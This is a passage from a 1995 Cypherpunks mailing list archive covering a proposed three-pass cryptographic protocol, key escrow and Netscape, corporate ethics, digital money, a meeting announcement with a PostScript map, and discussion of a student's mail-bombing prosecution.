protocol also seems to have the same property I claimed. Please tell me how a computationally unbounded adversary could defeat the following: (without active attack against which this immediatelly fails (i.e. it has to be combined with an authentication algorithm)). Please help me, this problem is totally driving me crazy! A VARIATION OF SHAMIR'S THREE PASS PROTOCOL SAFE FROM PASSIVE ATTACK BY A COMPUTATIONALLY UNBOUNDED ADVERSARY: Alice wants to send Bob a message. She is going to send her message a fraction of a bit of a time via the following protocol. Before hand: 1. Enumerate all the primes from 256 to 511. Call them N. 2. For each prime, enumerate all the numbers less than it that are also relatively prime to N-1. Call these E. 3. Number each pair of E and N. The algorithm can be divided into an inner loop and an outer loop. The outer loop calls the inner loop. Inner Loop: Alice wants to use the inner loop to send bit b. 1. Alice randomly chooses seven bits of salt, and prepends b to them creating an 8 bit M 2. Alice randomly chooses an (Na,Ea) pair from the list of possibilities. 3. Alice calculates D such that E*D mod (N-1) equals 1 4. Bob randomly chooses an (Nb,Eb) pair from the list of possibilities. 5. Bob calculates D 6. Alice sends Bob the nine bit number (M^Ea) mod Na = C1 7. Bob sends Alice (C1^Eb) mod Nb = C2 8. Alice sends Bob (C2^Da) mod Na = C3 9. Bob calculates (C3^Db) mod Nb = M, the bit being the MSB. The unbounded passive adversary calculates a probability (p) between 0.5 and one with which he/she can guess the bit. This is based on the facts that 1. only a fraction of all pairs of Na and Ea will map C2 to C3, 2. only a fraction of all pairs of Nb and Eb will map C1 to C2, 3. only a fraction of all Na are high enough to produce C1. With thousands of transform pairs, there are more bits of entropy in the transform and salt selection, than there is information in the three messages. Alice, Bob and Eve can thus know what p is. Outer Loop: 1. Alice sends Bob an initialization vector using the inner loop. 2. Alice uses the inner loop to send Bob a series of bits. Each bit is either a random bit or the next bit of the message depending what the value of p for the previous inner loop was. A simple proper (but VERY INEFFICIENT) outer loop algorithm would be the following: Alice: 1. If the p for the previous inner loop was 0.5, send the XOR of the message and the previously sent bit. 2. If the p for the previous message was not 0.5, send a random bit. Bob: 1. If the p for the previous message was 0.5, take the bit, XOR with the previous bit, and append it to the message. 2. Otherwise just save the bit for one more itteration. PLEASE help me. I CAN'T find how this fails to be information-theoretically secure, but I am convinced that it should not be possible to do this, and I have been absolutely unproductive at anything since I first started working on this. Cheers, Jason W. Solinsky From perry at piermont.com Tue Dec 5 09:25:26 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 5 Dec 95 09:25:26 PST Subject: No Privacy Right on "My" Desktop ? In-Reply-To: Message-ID: <199512051726.MAA10193@jekyll.piermont.com> "James M. Cobb" writes: > Friend, Enemy, Please stop now. You are becoming a big time nuisance. Perry From tcmay at got.net Tue Dec 5 10:09:00 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Dec 95 10:09:00 PST Subject: Do companies ever do the "right thing"? Message-ID: At 2:18 PM 12/4/95, Ed Carp wrote: >> That's always a tough position to be in. If Netscape or Microsoft >> knew what was the "right" thing to do, I don't doubt that they'd be >> doing it. > >That's one of the most politically and socially naive statements I've >ever heard. Corporations *never* do the "right thing" unless it will >increase their profits. Remember, corporations are in business to >make money by providing a product or service that people will pay >money for. Whatever gets in the way of that will fall by the >wayside. That's an economic fact of life. I can think of many cases where companies chose courses of actions that seemed to be motivated by choices about what is right and what is wrong. Viewing the "profit landscape," corporations have to balance movement to the "locally most profitable" regions (fertile valleys) or to movement further out into even more profitable regions. It is just not that case that all corporations make decisions about what is the "most profitable," at any cost. They have Boards of Directors with influence, and they have various sorts of "mission statements." This applies to small businesses as well, where the owners often make decisions about which markets to compete in based on their own personal moral choices. Vegetarian restaurants, for example, choose not to offer meat, even when market studies indicate their patronship would probably increase. I also know of electronics companies that, for various reasons, refuse to bid on government contracts. (Partly they fear sinking into a bureaucratic mess, partly they don't want to do military work.) Finally, many companies understand the value of "good will" (as we discuss so often in talking about reputations) and think carefully about how their actions will be perceived _long into the future_. It is the belief, I think, of most of us that Netscape will have its reputation diminished if it acquiesces without a strong fight to government plans for GAK. In this sense, if we are right, Netscape's longterm profits may be affected by their choice. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From EALLENSMITH at mbcl.rutgers.edu Tue Dec 5 10:39:56 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Tue, 5 Dec 95 10:39:56 PST Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Message-ID: <01HYG7SGZ8ZO9S3QKQ@mbcl.rutgers.edu> From: IN%"pfarrell at netcom.com" 5-DEC-1995 02:49:01.83 Accountants know how to meet acceptable auditing standards when transactions are in cash. I learned this from the CPA I live with. ----------------- How does this work? While I can see tracking expenditures (i.e., the advertized price of an item and the amount of that item purchased by a store), it would appear decidedly more difficult in the case of service companies (and even more so for self-employed individuals). I am not referring to a company being able to keep track of its own books; I am referring to the IRS accepting those books as the real ones, when a large part of the company's income is in cash and therefore hard to trace. -Allen From jlasser at rwd.goucher.edu Tue Dec 5 10:43:10 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Tue, 5 Dec 95 10:43:10 PST Subject: [NOISE] [POINTER] Message-ID: (All my messages will now be tagged as noise, because someone, somewhere, might disagree :) ) http://www.salon1999.com/current/features/media.html About censorship and fear in the media. No crypto mentions, but Exon, V-Chip, Internet, etc... for the average reader, really. But interesting nonetheless... Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From EALLENSMITH at mbcl.rutgers.edu Tue Dec 5 10:47:09 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Tue, 5 Dec 95 10:47:09 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9Meeting on Electronic Payment) Message-ID: <01HYG84E8ZRU9S3QKQ@mbcl.rutgers.edu> From: IN%"nsb+limbo at nsb.fv.com" "Nathaniel Borenstein" 5-DEC-1995 09:37:47.34 A true geodesic structure is self-supporting and self-structuring. A cryptographic infrastructure can and should be similar, I agree completely. However, a *monetary* infrastructure needs convertability, and the points of conversion are always the best targets of attack for criminals. (I've been casting about for an analogy to physical geodesics, and it's hard to find one. The best I can come up with is to imagine that in order to convert a carbon buckyball to a more conventional set of carbon molecules, you had to do it through a service bureau that was capable of error, fraud, or subversion by outside criminals. This would ONLY matter if you ever wanted to do such conversions, but it would matter a lot then, especially if you had to suffer a serious financial loss if you got the wrong carbon molecules at the end of the process.) IF you wanted to settle for a totally non-convertible economy (like rubles in the old Soviet Union, or like the LETS system on the net today, as I understand it) then you could build it geodesically. But if you want to be able to convert back and forth between Internet payment systems and non-Internet payment systems, it can never be truly geodesic. It will always be attackable at the points of conversion. (You may "trade digital certificates", but how do you know the ones you're receiving were obtained for legitimate real-world value?) Because of this, the underwriting financial institutions, who have a very reasonable desire to limit their own risk, will inevitably seek the protection-by-traceability offered by something less than perfect anonymity. We may not like it, but it's a very natural position to be taken by those who are actually bearing the financial risks at the point ---------------------------- All of this is assuming that the digital currency being produced has a one-to-one ratio with some "real" currency. If, for instance, the digital certificates were indeed bought with a one-to-one ratio from the producer, but were traded to others for "real" cash at some market-determined discount, the market would incorporate the risk. The traders who were willing to take the risk that the certificates were not actually worth one dollar/whatever would be able to make a profit by the difference between one digital dollar and one "real" dollar. The problem is simplified even more with privately backed currencies. -Allen From tcmay at got.net Tue Dec 5 11:10:52 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 5 Dec 95 11:10:52 PST Subject: No More Netscape Comments from Me Message-ID: Not that you all hang on my every word, but I owe it to you folks at least a brief mention of why I feel I can no longer comment on Netscape. Not for legal reasons, but for conflict-of-interest reasons. I'm in the midst of making some investments involving Netscape (buying/selling short, Internet Index options, etc.) and my comments from herein out could be thought of by some as disingenous. So, have fun riding the Great Internet Bubble of 1995! --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jk at digit.ee Tue Dec 5 11:46:37 1995 From: jk at digit.ee (Jyri Kaljundi) Date: Tue, 5 Dec 95 11:46:37 PST Subject: Apache-SSL for export Message-ID: Are the SSL patches for Apache available somewhere else than in USA or UK? You know I am a big security risk for those countries as I live in Estonia, so it is not allowed for me to get apache-ssl legally. Good old COCOM restrictions, the poor guys in Great Britain have not heard the world has changed. So can anyone suggest how to get the software? Ftp, fsp, http, e-mail, anything will do. Juri Kaljundi jk at digit.ee Digiturg http://www.digit.ee/ From dl at hplyot.obspm.fr Tue Dec 5 11:52:12 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Tue, 5 Dec 95 11:52:12 PST Subject: Nutscapify (was Re: Getting a copy of the Jim Clark speech) In-Reply-To: <199512010343.VAA26254@snoopy.vetmed.auburn.edu> Message-ID: <9512051952.AA00212@hplyot.obspm.fr> It's been around for ages, see http://agent2.lycos.com:8001/tools/nutscape/ Frank Stuart writes: [...] > I'm working on an "obnoxify" program to convert normal html documents into > documents that look normal to non-netscape browsers, but are too painful to > read with netscape > (, , etc.). I think tomorrow evening > would be a good time to decide whether or not to distribute it. regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom From wilcoxb at taussky.cs.colorado.edu Tue Dec 5 12:00:01 1995 From: wilcoxb at taussky.cs.colorado.edu (Bryce) Date: Tue, 5 Dec 95 12:00:01 PST Subject: The Newspaper sez J.Clark sez "Uncle Sam Needed for Net Security" Message-ID: <199512052001.NAA20742@taussky.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- daily news Uncle Sam Needed for Net Security picture By Anne Knowles November 29, 1995, 12 p.m. PT BOSTON--Getting the government involved in maintaining Internet data privacy may not be popular, but it's going to be necessary. That's the message Netscape Communications chair Jim Clark delivered this morning in his keynote address to an audience here at Email World and Internet Expo. To secure Net communications, the government will need to have access to private data exchanges using what is known as a key escrow security system, said Clark. He added that an invincible security system for the Net is possible, but such a system won't be built unless the government has a stake in it. "That's where key escrow comes in," said Clark. Key escrow is a controversial security system advocated by the Clinton administration that gives the government access to private Net communications. It uses public key cryptography, a system in which messages are coded and decoded using a set of private and public keys. In key escrow, the private key is held by both the individual or group and the government. The government can use the key ostensibly to read messages for intelligence and national security reasons. Currently the U.S. government restricts export of strong keys in excess of 40 bits so it can break the code if necessary. The weaker keys, however, make the messages vulnerable to other attacks as well. A group of French scientists, for example, cracked Netscape software using 40-bit keys by employing a network of supercomputers over the course of a week. According to Clark, though, restricting the export of stronger software isn't the answer. "That's the wrong solution; we need bulletproof keys." Netscape's stock price soared $20 yesterday based on a buy recommendation by Goldman Sachs. The stock continues to climb today: the share price is up $9 to $140. Clark said Netscape is trying to keep pace with everyone's expectations. "The Internet is a gargantuan opportunity, but it's up to us to take advantage of it." Expect to see more fluctuations. Said Steve Weiss, a principal at Product Management Group in San Francisco, "Anything like this that is so closely allied to wishes, bets, and beliefs is likely to move up and down quite a bit." The run up is a reflection of the promise the Internet holds for investors. After all, added Weiss, "the stock market is the mirror of the soul of the Internet." [Additonal reporting by Denise Shelton.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01 iQCVAwUBMMSk8PWZSllhfG25AQESyQP8DBxGvO9Gkbwya6MmAVPRpGH2kqhQ3As5 5+2WoUKRpAfRg/0riHqIRK1vB9NW6mIM8Tl1I1FH1E7cagamKAb3yqjIQ56UApQG 9ow2ULaT7bRUHkhQuSF2jOpsJvzJdXSJGtvUyxB+BM0roAQHjFeWSVoUYv2GgVgU 7AsJwlLYorQ= =/+dp -----END PGP SIGNATURE----- From loki at obscura.com Tue Dec 5 12:00:36 1995 From: loki at obscura.com (Lance Cottrell) Date: Tue, 5 Dec 95 12:00:36 PST Subject: USENIX Conference. Message-ID: USENIX is in San Diego this year so I will be attending. I hope to see some of you there. If you will be going, please drop me a note. If there are enough of us I will try to set up a BOF (birds of a feather) session for cypherpunk / remailer discussions. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From frissell at panix.com Tue Dec 5 12:06:12 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 5 Dec 95 12:06:12 PST Subject: another fbi prosecution Message-ID: <2.2b8.32.19951205200735.0067bb30@panix.com> At 07:30 AM 12/5/95 -0500, you wrote: > sophomore Dominick LaScala was charged last week in federal court with two > counts of computer fraud. I thought fraud was obtaining something of value by false pretenses or uttering a false document or something. Doesn't sound like fraud to me. DCF From eric at syzygy.com Tue Dec 5 12:28:22 1995 From: eric at syzygy.com (Eric Messick) Date: Tue, 5 Dec 95 12:28:22 PST Subject: ANNOUNCE: December 9th: Bay Area Cypherpunks Meeting and Party Message-ID: <199512052032.MAA02154@syzygy.com> Bay Area Cypherpunks Meeting and Party Saturday December 9th, 1995 What: Cypherpunks Meeting and Party When: Saturday December 9th, 4pm - ??? Who: You. Where: Our dome in the Santa Cruz Mountains We'll be providing some drinks and snacks. Please feel free to bring other consumables. Directions follow. Cut at the perferations and send to a PostScript printer to generate a map. Or, you can read the top of the file directly. This announcement is available on the Web at this URL, including a .gif version of the map and directions. - ->8 - - - ->8 - - - ->8 - - - ->8 - - - ->8 - - - ->8 - - - ->8 - - %!ps % Directions to KT & Eric's dome % % KT & Eric % 15139 Old Ranch Rd % Los Gatos CA 95030 8506 % +1 408 353 4751 % % From San Jose, take Highway 17 South from Highway 280 for 15 miles. % From Santa Cruz, take Highway 17 North from Highway 1 for 12.5 miles. % Exit Highway 17 at Summit Road (the only bridge over Highway 17 in % the mountains), and head west. % 0.5 miles west of 17, turn left from Summit Road onto Hutchinson Road. % 0.2 miles from Summit, just after Riva Ridge Road on the left and a long % group of mailboxes on the right, turn right from Hutchinson onto % Old Ranch Road. % A short distance down Old Ranch there is a three-way fork. The left % branch is a small driveway; the center branch is Old Ranch Road which % continues around a curve to the left (a sign points to the left to % indicate this); and the right branch leads to our house and three % others. Our address (15139) is on the top of a sign to the right. % Turn onto the rightmost fork, down a steep grade. % Our geodesic dome is 0.4 miles from Hutchinson Road down the rightmost % fork of Old Ranch Road. /fg { 0 setgray } def /bg { 1 setgray } def /r { moveto currentpoint } def /a { rmoveto pop pop currentpoint } def /ah { pop pop currentpoint } def /rc { rcurveto } def /lab { % x y alpha (str) gsave 4 2 roll rmoveto exch rotate show grestore } def /nl { show 7 sub r } def bg clippath fill 4.25 72 mul 5.5 72 mul translate 90 rotate 2 2 scale /Helvetica findfont 5 scalefont setfont 0 0 moveto currentpoint 70 -100 a currentpoint % North arrow 50 30 a fg 3 setlinewidth 0 60 rlineto ah stroke r 0 -10 1 -15 5 -20 rc stroke r gsave -5 5 rmoveto /Times-Bold findfont 13 scalefont setfont (N) show grestore pop pop r -12 20 -90 (to Santa Cruz -->) lab -25 210 -65 (<-- to San Jose) lab 11 setlinewidth fg 2 120 -10 170 -30 200 rc stroke r % 17 outer lines 7 setlinewidth bg 2 120 -10 170 -30 200 rc stroke r % 17 interior 1 setlinewidth fg 2 120 -10 170 -30 200 rc stroke r % 17 center 1.25 100 a 10 -40 270 (Highway 17) lab 2 setlinewidth -2.5 27 rmoveto fg 2 -7 5 -9 14.5 4.7 rc stroke r % summit to 17n -8.2 0 rmoveto fg -2.5 20 -10.5 30 -20.5 50 rc stroke r % summit to 17s -12.75 35 rmoveto fg 2 -15 -4 -8 -13.3 10 rc stroke r % 17s to summit 1 setlinewidth -3.2 49 rmoveto % bridge fingers fg 5 5 rlineto stroke r -3.2 49 rmoveto fg .85 -7 rlineto stroke r -18.5 52 rmoveto fg -3 6 rlineto stroke r -19 52 rmoveto fg -2 -6 rlineto stroke r -1 48 rmoveto % bridge border 9 setlinewidth fg -8 3 -13 5 -20 4 rc stroke r -1 48 rmoveto % bridge interior 7 setlinewidth bg -8 3 -13 5 -20 4 rc stroke r 2 setlinewidth .5 0 rmoveto fg 0 20 9.5 30 19.5 40 rc ah stroke r % 17n to summit currentpoint fg 10 10 25 15 40 10 rc stroke r % summit e 33 15 -15 (Summit Rd) lab 25 11.5 rmoveto fg 10 10 10 20 5 40 rc stroke r % mt charlie e 30 70 -80 (Mt Charlie Rd) lab 5 15 25 (Phone) lab 0 5 25 (Parking lot) lab pop pop r fg -20 10 -40 15 -48 10 rc ah stroke r % across bridge fg -16 -10 10 -35 -3 -43 rc ah stroke r fg 5 -10 0 -20 5 -30 rc stroke r % mt charlie w 5 -5 -80 (Mt Charlie Rd) lab fg -13 -8 -20 20 -30 15 rc ah stroke r fg -10 -5 -30 -20 -55 -20 rc ah stroke r fg 5 -10 0 -20 5 -30 rc stroke r % stagecoach 5 -5 280 (Stagecoach Rd) lab fg -25 0 -10 -20 -15 -25 rc ah stroke r fg -5 -5 -30 0 -40 0 rc stroke r % summit continues... -45 5 -5 (Summit Rd) lab fg 5 -5 0 -20 0 -30 rc ah stroke r % hutchinson 5 25 -90 (Hutchinson Rd) lab % side road could go here fg 0 -10 3 -10 5 -17 rc ah stroke r fg 5 -5 10 -8 20 -8 rc stroke r % riva ridge 15 -5 0 (Riva Ridge Rd) lab fg 1 -3 1 -4 2 -7 rc ah stroke r fg 1 -3 5 -5 10 -7 rc stroke r % hutchinson continues... 3 -12 -20 (Hutchinson Rd) lab 1.5 setlinewidth fg -5 -5 -10 8 -15 3 rc ah stroke r % old ranch fg -3 -3 0 -10 5 -15 rc stroke r % old ranch continues... -8 -9 -55 (Old Ranch Rd) lab 1 setlinewidth fg 2 1 rmoveto -1 -2 1 -4 5 -7 rc stroke r % left fork driveway fg -5 5 -15 15 -20 12 rc ah stroke r % our portion of old ranch fg -5 -3 -15 -15 -25 -10 rc ah stroke r fg -10 5 -15 5 -20 0 rc ah stroke r fg -5 -5 -10 -5 -20 0 rc stroke r % our portion continues... fg 5 -5 rlineto ah stroke r % our driveway fg 7 2 rmoveto currentpoint newpath 3 0 360 arc stroke r /Helvetica-Bold findfont 5 scalefont setfont -15 -10 0 (KT & Eric) lab -15 -15 0 (15139 Old Ranch Rd) lab -15 -20 0 (Los Gatos CA 95030 8506) lab -15 -25 0 (+1 408 353 4751) lab -155 115 moveto ah /Times-Roman findfont 6 scalefont setfont (From San Jose, take Highway 17 South from Highway 280 for 15 miles.) nl (From Santa Cruz, take Highway 17 North from Highway 1 for 12.5 miles.) nl (Exit Highway 17 at Summit Road \(the only bridge over Highway 17 in) nl ( the mountains\), and head west.) nl (0.5 miles west of 17, turn left from Summit Road onto Hutchinson Road.) nl (0.2 miles from Summit, just after Riva Ridge Road on the left and a long group) nl ( of mailboxes on the right, turn right from Hutchinson onto Old Ranch Road.) nl (A short distance down Old Ranch there is a three-way fork. The left branch is a) nl ( small driveway; the center branch is Old Ranch Road which continues around a) nl ( curve to the left \(a sign points to the left to indicate this\); and the right branch) nl ( leads to our house and three others. Our address \(15139\) is on the top of a) nl ( sign to the right. Turn onto the rightmost fork, down a steep grade.) nl (Our geodesic dome is 0.4 miles from Hutchinson Road down the rightmost) nl ( fork of Old Ranch Road.) nl -80 128 moveto ah /Times-Bold findfont 12 scalefont setfont (Directions to KT & Eric's dome) nl pop pop showpage From hfinney at shell.portal.com Tue Dec 5 12:29:11 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 5 Dec 95 12:29:11 PST Subject: towards a theory of reputation Message-ID: <199512052029.MAA08717@jobe.shell.portal.com> From: Scott Brickner > > Hal writes: > >Changing the market conventions (say, by introducing escrow agencies) > >will change the weightings of the various factors that make up > >utility. If I no longer have to trust the honesty of the person I am > >trading with (because we have an escrow agency to help us make the > >exchange) then the importance of his reputation for honesty goes down. > >The result is that the "reputation" curves will change rather > >dynamically and unpredictably as we consider different possible > >structures in the market. This will make the analysis of them > >intractable, I would think. > > Analytically, using an escrow agent doesn't change the utility > function. It replaces the trading partner's honesty reputation > estimate with the escrow agent's (which is presumably higher, or why > use them?). This is just a parameter substitution. > > Whence comes the intractability? By the "utility function" I was referring to Wei's model in which each person has an idea of how much "utility" (a general summation of personal value and usefulness) they would get from another person, as a function of cost. The utility function takes cost as input and returns "utiles" (or whatever) as output. So, with this model, using an escrow agent would change the utility function; for a given cost, the utility of a person to me would change (say, if the person involved were thought to be dishonest, then the presence of escrow agents would make him more useful to me). The utility function in Wei's model is a curve where the Y axis is utility and the X axis is cost. Changing the importance of honesty will change the position and shape of this curve. I think it would be more tractable to have a model in which honesty played an explicit part. We might even make assumptions about the mathematical relationship between honesty and overall utility - for example, that utility to me would be monotonically increasing with increased honesty of the other guy. What I mean is something like this. Let t be the degree of trust necessary for a business relationship to be consummated. For t=0, no trust is needed, and the relationship is such that neither party takes any significant risk - a cash sale, perhaps. For t=1, in some sense total trust is needed, and a party can cheat the other with 100% safety. Now let h(t) be the honesty reputation of a person, so that the utility which people expect to receive from them gets multiplied by h(t). For a person with a repuation for honesty, h(t) is close to 1 for all t. For a person who seems dishonest, h(t) will go from 1 to 0 as t goes from 0 to 1. This is all pretty hand-wavy, but the idea would be to come up with good strategies to estimate h(t) from a person's behavior, and good ways to choose what kind of behavior one should follow given the value(s) of t which are prevalent in the market. This kind of analysis would lead you to focus on the importance of the amount of trust needed in a transaction. The underlying utility function is based on such traditional factors as productivity and reliability. It won't change as we consider the variables of our analysis, because we have factored out the honesty and trust issues so that they are more explicit. That's the kind of direction I was suggesting. Hal From mab at nsa.tempo.att.com Tue Dec 5 12:33:01 1995 From: mab at nsa.tempo.att.com (Matt Blaze) Date: Tue, 5 Dec 95 12:33:01 PST Subject: latest librand source now available Message-ID: <199512052034.PAA26869@nsa.tempo.att.com> Souce code for the latest version of librand (a random number package based on event interval variations) for Unix-like machines is now available in: ftp://ftp.research.att.com/dist/mab/librand.shar There are no restictions on use or distribution of this code, which was written by Matt Blaze, Jack Lacy, and Don Mitchell. -matt From nobody at REPLAY.COM Tue Dec 5 12:51:34 1995 From: nobody at REPLAY.COM (Anonymous) Date: Tue, 5 Dec 95 12:51:34 PST Subject: Do the Right Thing Message-ID: <199512052052.VAA02122@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- cactus at hks.net (Leslie Todd Masco) wrote: >In article <199512050326.VAA30525 at khijol>, Ed Carp wrote: >>That's one of the most politically and socially naive statements I've >>ever heard. Corporations *never* do the "right thing" unless it will >>increase their profits. > >I just *love* hearing statments like this from people who have probably >never started their own businesses. Perhaps they've worked for a corporation? :-) >Corporations are no more or less than their component people. If the people >running a corporation care about an issue, the corporation will act upon >it -- bounded by the interaction of their survival instinct with their >assessment of reality. How could it be otherwise? Certainly. In many organizations, the people who set policy, and the people who "run" the corporation are not the same. Often important managers disagree on issues or on how to achieve them. Individuals within the company are often focused more on their careers and position within the company, than on the affect their decisions have outside the company. To equate an organization, especially a large one, with its constituent parts ensures that you will be continually surprised by its complex and unpredictable behavior. BTW, the crypto relevance of this thread is nil. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMMSvq4iUi5SQtQ3tAQF0BAgAwItXRVPLN4f20vAnS7hVj2uAvK7bfqpG Zp9zVNQoBQfmf+K3KWhdH4a7mg6wAS1MLEyobpcBVyS/W6bBS+3a7TSfQjxRNp7L RKGeyJG+VO4npX0wZ10OuTbQekjr5MkxfQWYI1MnFvAWsyQA05XeKP2fZBRvWDtm OGM+1BJtFpNEAPJFDV+o2gHojwVZ870v0zH/9SA2/eTnh5PDqmbb90N7m+ccnRU+ yTSecohxnBeWHslz0FEDw1ZKud9kHCqWWRWIVkBUK7JRxW4o+/yazMfw1d8w+NAI C/SMP2boacdmv71i3bhgHtm0O4FT0UJKbsstLq7IKg/7E6MuuiFydA== =7GRj -----END PGP SIGNATURE----- From mab at research.att.com Tue Dec 5 12:51:51 1995 From: mab at research.att.com (Matt Blaze) Date: Tue, 5 Dec 95 12:51:51 PST Subject: latest librand source now available Message-ID: <199512052058.PAA27083@nsa.tempo.att.com> [Sorry if this is a duplicate; my machine had a bogus sendmail.cf when I first sent this.] Souce code for the latest version of librand (a random number package based on event interval variations) for Unix-like machines is now available in: ftp://ftp.research.att.com/dist/mab/librand.shar There are no restictions on use or distribution of this code, which was written by Matt Blaze, Jack Lacy, and Don Mitchell. -matt From andreas at artcom.de Tue Dec 5 12:52:23 1995 From: andreas at artcom.de (Andreas Bogk) Date: Tue, 5 Dec 95 12:52:23 PST Subject: The Newspaper sez J.Clark sez "Uncle Sam Needed for Net Security" In-Reply-To: <199512052001.NAA20742@taussky.cs.colorado.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >>>>> "Bryce" == Bryce writes: Bryce> To secure Net communications, the government will Bryce> need to have access to private data exchanges using what is Bryce> known as a key escrow security system, said Clark. He added Who was the guy who asked why "we" are mad at netscape? Well, I am because of exactly this blatant lie. Andreas -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAgUBMMSvwEyjTSyISdw9AQErLQP+OjvvewMSjV4FfVxsAE3ILmXoSGHqfn3P UMn9M2YOluJzejKSOypAGB/LcR0YpukLrLL0QZRxWANRX9WOxaUUtdUVHM4N1YOF q7o2FdbGRp6gX/7VDsFY63cIUmzNb8fvFLbtQkF12Emz+gmlXiEZvuU9fjpWy0Sn VkwdkCi/pMU= =1p7G -----END PGP SIGNATURE----- From dl at hplyot.obspm.fr Tue Dec 5 12:52:32 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Tue, 5 Dec 95 12:52:32 PST Subject: [NOISE] Barring access to Netscape In-Reply-To: <199512012041.PAA29577@gold.interlog.com> Message-ID: <9512052052.AA00507@hplyot.obspm.fr> Herb Sutter writes: > At 14:26 12.01.1995 -0500, Robert A. Rosenberg wrote: > >If you want to see one way of locking out Netscape users, check out this > >URL which points at a Web Page that will not allow access by Netscape Users [...] > JeffW: Please add a configuration option to let users override the "Mozilla" > ident, so that they can continue to use Netscape at all sites. I personally > won't use the override, though; if a site is going to insist on trying to > frivolously exlude me as a user based on nothing but the browser I choose to > use, they aren't serious anyway. You can use my anonymous proxy which strips off all 'personal' informations, including User-Agent: ... While I let Mozillas access it :-) dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept From llurch at networking.stanford.edu Tue Dec 5 12:55:39 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Tue, 5 Dec 95 12:55:39 PST Subject: another fbi prosecution In-Reply-To: <2.2b8.32.19951205200735.0067bb30@panix.com> Message-ID: On Tue, 5 Dec 1995, Duncan Frissell wrote: > At 07:30 AM 12/5/95 -0500, you wrote: > > > sophomore Dominick LaScala was charged last week in federal court with two > > counts of computer fraud. > > I thought fraud was obtaining something of value by false pretenses or > uttering a false document or something. Doesn't sound like fraud to me. I think they're referring to at least one of the accounts being obtained under false pretenses, and the From: lines (and probably Message-ID, Received, etc) being forged. Which would still be an interesting precedent, yes. -rich From JonathanZ at consensus.com Tue Dec 5 12:56:20 1995 From: JonathanZ at consensus.com (Jonathan Zamick) Date: Tue, 5 Dec 95 12:56:20 PST Subject: ANNOUNCE: December 9th: Bay Area Cypherpunks Meeting and Party Message-ID: At 12:32 PM 12/5/95, Eric Messick wrote: >Bay Area Cypherpunks Meeting and Party > >Saturday December 9th, 1995 > >What: Cypherpunks Meeting and Party >When: Saturday December 9th, 4pm - ??? >Who: You. >Where: Our dome in the Santa Cruz Mountains > >We'll be providing some drinks and snacks. Please feel free to bring >other consumables. Heh. I'm still sorry I'll be missing this. I'm sadly going to be up in Chicago that weekend getting ready for an internet security conference. Since, I'm CC:ing this to the list, is anyone else going to be at 'Securing Electronic Commerce on the Internet?' Thought it might be interesting to dive out for dinner some evening with a few other Cpunk. Jonathan ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page .. From pcw at access.digex.net Tue Dec 5 12:58:52 1995 From: pcw at access.digex.net (Peter Wayner) Date: Tue, 5 Dec 95 12:58:52 PST Subject: another fbi prosecution Message-ID: At 7:30 AM 12/5/95, Bob Bruen, MIT Lab for Nuclear Science wrote: > Dominick had his campus account taken away after other users complained > that he had been "advertising business proposals inappropriately on line." > The FBI alleges that he then sent 24,000 email messages in one day from a > commercial account (unamed) to Monmouth's system.. This denial of service > attack was successful for about 5 hours. He is facing six(6) years in prison > and a up to $350,000 in fines (1.20 years/hr and and $70,000/hr). > > His lawyer (Kenneth Weiner) claims that "even if his client sent the mail > bomb" since no damage was done to the system, he could not be convicted > under the computer fraud statute. He also claims that prosecutors are trying > to make an example of his client. The university is still trying to figure > out whether he can be punished under the university code of conduct. > If Monmouth college is like almost every other college I know, they routinely send out "mail bombs" to their alumni. That is, mass mailings sent through the postal service. Given that we've agreed to legitimize this behavior in the paper world, I can't see what's so wrong about doing it in the electronic world. Of course, he could have been spreading false advertising which would really be fraud. -Peter From dl at hplyot.obspm.fr Tue Dec 5 